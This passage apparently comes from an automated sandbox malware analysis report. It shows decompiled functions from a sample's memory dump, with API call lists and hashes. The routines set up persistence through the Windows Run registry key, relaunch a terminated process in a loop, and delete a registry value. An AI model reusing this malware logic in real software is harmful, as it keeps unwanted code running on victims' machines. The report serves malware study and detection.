                                                                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                                                            				void** _v28;
                                                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                                                            				void* _t60;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				if(_a4 != 0) {
                                                                                                                                                                                                                                                                            					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                            					_v12 = 0x96;
                                                                                                                                                                                                                                                                            					_v16 = 0x1388;
                                                                                                                                                                                                                                                                            					_v8 = _a4;
                                                                                                                                                                                                                                                                            					if( *_v8 != 0) {
                                                                                                                                                                                                                                                                            						_v20 = 0;
                                                                                                                                                                                                                                                                            						while(_v20 < 0x96) {
                                                                                                                                                                                                                                                                            							_v24 = 0;
                                                                                                                                                                                                                                                                            							_t37 = GetExitCodeProcess(_v8[3],  &_v24); // executed
                                                                                                                                                                                                                                                                            							if(_t37 == 0) {
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								if(_v24 != 0x103) {
                                                                                                                                                                                                                                                                            									CloseHandle(_v8[3]);
                                                                                                                                                                                                                                                                            									Sleep(0x7530);
                                                                                                                                                                                                                                                                            									_t40 = E007B2070( *_v8);
                                                                                                                                                                                                                                                                            									_t60 = _t60 + 4;
                                                                                                                                                                                                                                                                            									_v8[3] = _t40;
                                                                                                                                                                                                                                                                            									if(_v8[3] != 0) {
                                                                                                                                                                                                                                                                            										_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                            										if((_v8[2] & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                            											E007B2510(_v8[3], 0x7be290);
                                                                                                                                                                                                                                                                            											_t60 = _t60 + 8;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										goto L11;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                            									L11:
                                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						VirtualFree( *_v8, 0, 0x8000);
                                                                                                                                                                                                                                                                            						_v28 = _v8;
                                                                                                                                                                                                                                                                            						E007B97C0(_v28);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                                                            0x007b77ba
                                                                                                                                                                                                                                                                            0x007b77c2
                                                                                                                                                                                                                                                                            0x007b77c8
                                                                                                                                                                                                                                                                            0x007b77cf
                                                                                                                                                                                                                                                                            0x007b77d9
                                                                                                                                                                                                                                                                            0x007b77e2
                                                                                                                                                                                                                                                                            0x007b77e8
                                                                                                                                                                                                                                                                            0x007b77ef
                                                                                                                                                                                                                                                                            0x007b77fc
                                                                                                                                                                                                                                                                            0x007b780e
                                                                                                                                                                                                                                                                            0x007b7816
                                                                                                                                                                                                                                                                            0x007b7818
                                                                                                                                                                                                                                                                            0x007b781f
                                                                                                                                                                                                                                                                            0x007b7835
                                                                                                                                                                                                                                                                            0x007b7840
                                                                                                                                                                                                                                                                            0x007b784c
                                                                                                                                                                                                                                                                            0x007b7851
                                                                                                                                                                                                                                                                            0x007b7857
                                                                                                                                                                                                                                                                            0x007b7861
                                                                                                                                                                                                                                                                            0x007b786d
                                                                                                                                                                                                                                                                            0x007b7879
                                                                                                                                                                                                                                                                            0x007b7887
                                                                                                                                                                                                                                                                            0x007b788c
                                                                                                                                                                                                                                                                            0x007b788c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b7863
                                                                                                                                                                                                                                                                            0x007b7821
                                                                                                                                                                                                                                                                            0x007b7826
                                                                                                                                                                                                                                                                            0x007b788f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b7893
                                                                                                                                                                                                                                                                            0x007b781f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b7816
                                                                                                                                                                                                                                                                            0x007b78a5
                                                                                                                                                                                                                                                                            0x007b78ae
                                                                                                                                                                                                                                                                            0x007b78b5
                                                                                                                                                                                                                                                                            0x007b78ba
                                                                                                                                                                                                                                                                            0x007b78bd
                                                                                                                                                                                                                                                                            0x007b78bd
                                                                                                                                                                                                                                                                            0x007b78c8

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 007B77C2
                                                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNELBASE(00000000,00000000), ref: 007B780E
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 007B7826
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00001388), ref: 007B7835
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00007530), ref: 007B7840
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000096,00000000,00008000), ref: 007B78A5
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 007B78BD
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Sleep$CloseCodeExitFreeHandleInitializeProcessUninitializeVirtual
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2326833528-0
                                                                                                                                                                                                                                                                            • Opcode ID: 8351e47e219bc82119c26819788191761654847cb8342c8091b0955cf1e8cc72
                                                                                                                                                                                                                                                                            • Instruction ID: 580a40b7e1f1f530dffaf9d0f62168e60466ef0b705179579b1b15f25d9138f2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8351e47e219bc82119c26819788191761654847cb8342c8091b0955cf1e8cc72
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D314D74A04209EFDB04DFA4D849BEEB7B1FB88305F24C658E405A7391D779AE40DBA1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B5CD0(CHAR* _a4) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && lstrlenA(_a4) >= 4) {
                                                                                                                                                                                                                                                                            					_t29 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                            					_v12 = _t29;
                                                                                                                                                                                                                                                                            					if(_v12 != 0xffffffff) {
                                                                                                                                                                                                                                                                            						_v16 = GetFileSize(_v12, 0);
                                                                                                                                                                                                                                                                            						if(_v16 > 0) {
                                                                                                                                                                                                                                                                            							_t34 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            							_v20 = _t34;
                                                                                                                                                                                                                                                                            							if(_v20 != 0) {
                                                                                                                                                                                                                                                                            								_v24 = 0;
                                                                                                                                                                                                                                                                            								ReadFile(_v12, _v20, _v16,  &_v24, 0); // executed
                                                                                                                                                                                                                                                                            								if(_v24 == _v16) {
                                                                                                                                                                                                                                                                            									_v8 = E007B16F0(_v20, _v16);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						FindCloseChangeNotification(_v12); // executed
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                                                            0x007b5cd6
                                                                                                                                                                                                                                                                            0x007b5ce1
                                                                                                                                                                                                                                                                            0x007b5d10
                                                                                                                                                                                                                                                                            0x007b5d16
                                                                                                                                                                                                                                                                            0x007b5d1d
                                                                                                                                                                                                                                                                            0x007b5d2f
                                                                                                                                                                                                                                                                            0x007b5d36
                                                                                                                                                                                                                                                                            0x007b5d45
                                                                                                                                                                                                                                                                            0x007b5d4b
                                                                                                                                                                                                                                                                            0x007b5d52
                                                                                                                                                                                                                                                                            0x007b5d54
                                                                                                                                                                                                                                                                            0x007b5d6d
                                                                                                                                                                                                                                                                            0x007b5d79
                                                                                                                                                                                                                                                                            0x007b5d8b
                                                                                                                                                                                                                                                                            0x007b5d8b
                                                                                                                                                                                                                                                                            0x007b5d99
                                                                                                                                                                                                                                                                            0x007b5d99
                                                                                                                                                                                                                                                                            0x007b5d52
                                                                                                                                                                                                                                                                            0x007b5da3
                                                                                                                                                                                                                                                                            0x007b5da3
                                                                                                                                                                                                                                                                            0x007b5d1d
                                                                                                                                                                                                                                                                            0x007b5daf

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 007B5CEB
                                                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 007B5D10
                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 007B5D29
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 007B5D45
                                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(000000FF,00000000,00000000,00000000,00000000), ref: 007B5D6D
                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 007B5D99
                                                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 007B5DA3
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Virtual$AllocChangeCloseCreateFindFreeNotificationReadSizelstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 443218420-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5cf340b04185baeebaa086366f2d4aa389c3a966e7a56534809f8bc2de4512e4
                                                                                                                                                                                                                                                                            • Instruction ID: 20f31b9b7fe12bec9772bc1fbccc2c1ea98f0c58b46184c757d949c1395b63e9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5cf340b04185baeebaa086366f2d4aa389c3a966e7a56534809f8bc2de4512e4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4521ECB5E00208FBDB11DBA4DC89FAE7775AB48701F108648F615B72C0C7789A40CB64
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B12D0(CHAR* _a4) {
                                                                                                                                                                                                                                                                            				CHAR* _v8;
                                                                                                                                                                                                                                                                            				char* _v12;
                                                                                                                                                                                                                                                                            				CHAR* _v16;
                                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                                                                            				long _t26;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = _a4;
                                                                                                                                                                                                                                                                            				if(_v8 != 0) {
                                                                                                                                                                                                                                                                            					_v16 = _v8;
                                                                                                                                                                                                                                                                            					_v12 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                                            					while( *0x7c4370 == 0) {
                                                                                                                                                                                                                                                                            						_v20 = 0x80000001;
                                                                                                                                                                                                                                                                            						if(( *(_v8 + 0x30c) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            							_v20 = 0x80000002;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v24 = 0;
                                                                                                                                                                                                                                                                            						_t26 = RegOpenKeyExA(_v20, _v12, 0, 0xf003f,  &_v24); // executed
                                                                                                                                                                                                                                                                            						if(_t26 == 0) {
                                                                                                                                                                                                                                                                            							_v28 = lstrlenA(_v16);
                                                                                                                                                                                                                                                                            							RegSetValueExA(_v24, _v8 + 0x208, 0, 1, _v16, _v28); // executed
                                                                                                                                                                                                                                                                            							RegCloseKey(_v24); // executed
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                                                            0x007b12d9
                                                                                                                                                                                                                                                                            0x007b12e0
                                                                                                                                                                                                                                                                            0x007b12e9
                                                                                                                                                                                                                                                                            0x007b12ec
                                                                                                                                                                                                                                                                            0x007b12f3
                                                                                                                                                                                                                                                                            0x007b1301
                                                                                                                                                                                                                                                                            0x007b1314
                                                                                                                                                                                                                                                                            0x007b1316
                                                                                                                                                                                                                                                                            0x007b1316
                                                                                                                                                                                                                                                                            0x007b131d
                                                                                                                                                                                                                                                                            0x007b1337
                                                                                                                                                                                                                                                                            0x007b133f
                                                                                                                                                                                                                                                                            0x007b134b
                                                                                                                                                                                                                                                                            0x007b1368
                                                                                                                                                                                                                                                                            0x007b1372
                                                                                                                                                                                                                                                                            0x007b1372
                                                                                                                                                                                                                                                                            0x007b137d
                                                                                                                                                                                                                                                                            0x007b137d
                                                                                                                                                                                                                                                                            0x007b12fc
                                                                                                                                                                                                                                                                            0x007b138d

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,00000000), ref: 007B1337
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 007B1345
                                                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(00000000,-00000208,00000000,00000001,?,?), ref: 007B1368
                                                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(00000000), ref: 007B1372
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 007B137D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseOpenSleepValuelstrlen
                                                                                                                                                                                                                                                                            • String ID: software\microsoft\windows\currentversion\run
                                                                                                                                                                                                                                                                            • API String ID: 3411147897-1396020897
                                                                                                                                                                                                                                                                            • Opcode ID: 4ecebd7aa6b0b326941178c5a579259a2aeb46a8c57b37bde132266435f17dc3
                                                                                                                                                                                                                                                                            • Instruction ID: 9f3a12e6b4dfc74e9f7ebb3e01de28b4a6bcfaeac0d6d6c9b724c9e0499594b9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ecebd7aa6b0b326941178c5a579259a2aeb46a8c57b37bde132266435f17dc3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3210A70A00209EBDB05DFE5CD59FEEBBB4BB49301F608258F601A7690D7789A40DBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B5B50(CHAR* _a4, char* _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                                                                            				int _v32;
                                                                                                                                                                                                                                                                            				char* _v36;
                                                                                                                                                                                                                                                                            				char* _v40;
                                                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                                                            				void* _t69;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                            					_v32 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                            					_v28 = lstrlenA(_a4);
                                                                                                                                                                                                                                                                            					_v24 = 0;
                                                                                                                                                                                                                                                                            					_v16 = 0;
                                                                                                                                                                                                                                                                            					while(_v24 < _v28) {
                                                                                                                                                                                                                                                                            						_v36 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                                            						if(_v36 != 0) {
                                                                                                                                                                                                                                                                            							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                            							_v24 = _v36 - _a4 + _v32;
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v20 = _v16 * 0x28;
                                                                                                                                                                                                                                                                            					_t69 = VirtualAlloc(0, _v20, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            					_v12 = _t69;
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						_v24 = 0;
                                                                                                                                                                                                                                                                            						_v16 = 0;
                                                                                                                                                                                                                                                                            						while(_v24 < _v28) {
                                                                                                                                                                                                                                                                            							_v40 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                                            							if(_v40 != 0) {
                                                                                                                                                                                                                                                                            								lstrcpynA(_v12 + _v16 * 0x28,  &(_a4[_v24]), _v40 -  &(_a4[_v24]) + 1);
                                                                                                                                                                                                                                                                            								_v24 = _v40 - _a4 + _v32;
                                                                                                                                                                                                                                                                            								_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                            								_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                            								 *_a12 = _v12;
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(_a16 != 0) {
                                                                                                                                                                                                                                                                            							_v44 = VirtualAlloc(0, _v20, 0x3000, 4);
                                                                                                                                                                                                                                                                            							if(_v44 != 0) {
                                                                                                                                                                                                                                                                            								E007B7B70(_v44, _v12, _v20);
                                                                                                                                                                                                                                                                            								 *_a16 = _v44;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                                                            0x007b5b56
                                                                                                                                                                                                                                                                            0x007b5b61
                                                                                                                                                                                                                                                                            0x007b5b85
                                                                                                                                                                                                                                                                            0x007b5b92
                                                                                                                                                                                                                                                                            0x007b5b95
                                                                                                                                                                                                                                                                            0x007b5b9c
                                                                                                                                                                                                                                                                            0x007b5ba3
                                                                                                                                                                                                                                                                            0x007b5bbc
                                                                                                                                                                                                                                                                            0x007b5bc3
                                                                                                                                                                                                                                                                            0x007b5bcb
                                                                                                                                                                                                                                                                            0x007b5bd7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b5bde
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b5bc3
                                                                                                                                                                                                                                                                            0x007b5be6
                                                                                                                                                                                                                                                                            0x007b5bf6
                                                                                                                                                                                                                                                                            0x007b5bfc
                                                                                                                                                                                                                                                                            0x007b5c03
                                                                                                                                                                                                                                                                            0x007b5c09
                                                                                                                                                                                                                                                                            0x007b5c10
                                                                                                                                                                                                                                                                            0x007b5c17
                                                                                                                                                                                                                                                                            0x007b5c30
                                                                                                                                                                                                                                                                            0x007b5c37
                                                                                                                                                                                                                                                                            0x007b5c59
                                                                                                                                                                                                                                                                            0x007b5c68
                                                                                                                                                                                                                                                                            0x007b5c71
                                                                                                                                                                                                                                                                            0x007b5c7a
                                                                                                                                                                                                                                                                            0x007b5c87
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b5c87
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b5c37
                                                                                                                                                                                                                                                                            0x007b5c8f
                                                                                                                                                                                                                                                                            0x007b5ca4
                                                                                                                                                                                                                                                                            0x007b5cab
                                                                                                                                                                                                                                                                            0x007b5cb9
                                                                                                                                                                                                                                                                            0x007b5cc7
                                                                                                                                                                                                                                                                            0x007b5cc7
                                                                                                                                                                                                                                                                            0x007b5cab
                                                                                                                                                                                                                                                                            0x007b5c8f
                                                                                                                                                                                                                                                                            0x007b5c03
                                                                                                                                                                                                                                                                            0x007b5ccf

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 007B5B7F
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 007B5B8C
                                                                                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,00000000), ref: 007B5BB6
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 007B5BF6
                                                                                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,00000000), ref: 007B5C2A
                                                                                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,00000000,-00000001), ref: 007B5C59
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 007B5C9E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocVirtuallstrlen$lstrcpyn
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 808621155-0
                                                                                                                                                                                                                                                                            • Opcode ID: 58d075a0de326fbff9281dfc4d206c2ea8d53275ab13494a2ce0c8ba7834b92d
                                                                                                                                                                                                                                                                            • Instruction ID: 43eaad405b9819d5069930bb0fa3c39c514b6d404a79d2ee6dbe18a1ae6dcdc3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58d075a0de326fbff9281dfc4d206c2ea8d53275ab13494a2ce0c8ba7834b92d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD51D7B5900609EFCB04CF98C998BEEBBB5FF48305F248559E505A7384C379AA40CFA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B6CF0() {
                                                                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				int _v20;
                                                                                                                                                                                                                                                                            				int _v24;
                                                                                                                                                                                                                                                                            				long _v28;
                                                                                                                                                                                                                                                                            				char _v60;
                                                                                                                                                                                                                                                                            				long _t21;
                                                                                                                                                                                                                                                                            				long _t24;
                                                                                                                                                                                                                                                                            				char* _t26;
                                                                                                                                                                                                                                                                            				char* _t30;
                                                                                                                                                                                                                                                                            				char* _t32;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                                                                            				_v12 = 0x80000001;
                                                                                                                                                                                                                                                                            				if(( *0x7c435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            					_v12 = 0x80000002;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                                                                            				_t32 =  *0x7c18a0; // 0x7c3b88
                                                                                                                                                                                                                                                                            				_t21 = RegOpenKeyExA(_v12, _t32, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                                            				if(_t21 == 0) {
                                                                                                                                                                                                                                                                            					_v24 = 0x20;
                                                                                                                                                                                                                                                                            					_v20 = 3;
                                                                                                                                                                                                                                                                            					_t30 =  *0x7c1890; // 0x7c3fa6
                                                                                                                                                                                                                                                                            					_t24 = RegQueryValueExA(_v16, _t30, 0,  &_v20,  &_v60,  &_v24); // executed
                                                                                                                                                                                                                                                                            					_v28 = _t24;
                                                                                                                                                                                                                                                                            					if(_v28 == 0) {
                                                                                                                                                                                                                                                                            						_v5 = 1;
                                                                                                                                                                                                                                                                            						_t26 =  *0x7c1890; // 0x7c3fa6
                                                                                                                                                                                                                                                                            						RegDeleteValueA(_v16, _t26);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					RegCloseKey(_v16);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v5;
                                                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                                                            0x007b6cf6
                                                                                                                                                                                                                                                                            0x007b6cfa
                                                                                                                                                                                                                                                                            0x007b6d0a
                                                                                                                                                                                                                                                                            0x007b6d0c
                                                                                                                                                                                                                                                                            0x007b6d0c
                                                                                                                                                                                                                                                                            0x007b6d13
                                                                                                                                                                                                                                                                            0x007b6d25
                                                                                                                                                                                                                                                                            0x007b6d30
                                                                                                                                                                                                                                                                            0x007b6d38
                                                                                                                                                                                                                                                                            0x007b6d3a
                                                                                                                                                                                                                                                                            0x007b6d41
                                                                                                                                                                                                                                                                            0x007b6d56
                                                                                                                                                                                                                                                                            0x007b6d61
                                                                                                                                                                                                                                                                            0x007b6d67
                                                                                                                                                                                                                                                                            0x007b6d6e
                                                                                                                                                                                                                                                                            0x007b6d70
                                                                                                                                                                                                                                                                            0x007b6d74
                                                                                                                                                                                                                                                                            0x007b6d7e
                                                                                                                                                                                                                                                                            0x007b6d7e
                                                                                                                                                                                                                                                                            0x007b6d88
                                                                                                                                                                                                                                                                            0x007b6d88
                                                                                                                                                                                                                                                                            0x007b6d94

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,007C3B88,00000000,000F003F,00000000), ref: 007B6D30
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(00000000,007C3FA6,00000000,00000003,?,00000020), ref: 007B6D61
                                                                                                                                                                                                                                                                            • RegDeleteValueA.ADVAPI32(00000000,007C3FA6), ref: 007B6D7E
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 007B6D88
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 647993726-3916222277
                                                                                                                                                                                                                                                                            • Opcode ID: a2ddc9229a76aa698be45a2cc7e293f60d399dbbfcd14f47a31b8a2cb0b095bf
                                                                                                                                                                                                                                                                            • Instruction ID: 88eacb610cfc91bfcf9517a342a6da82fba67a55634d5f16e0e96a7c0c65524c
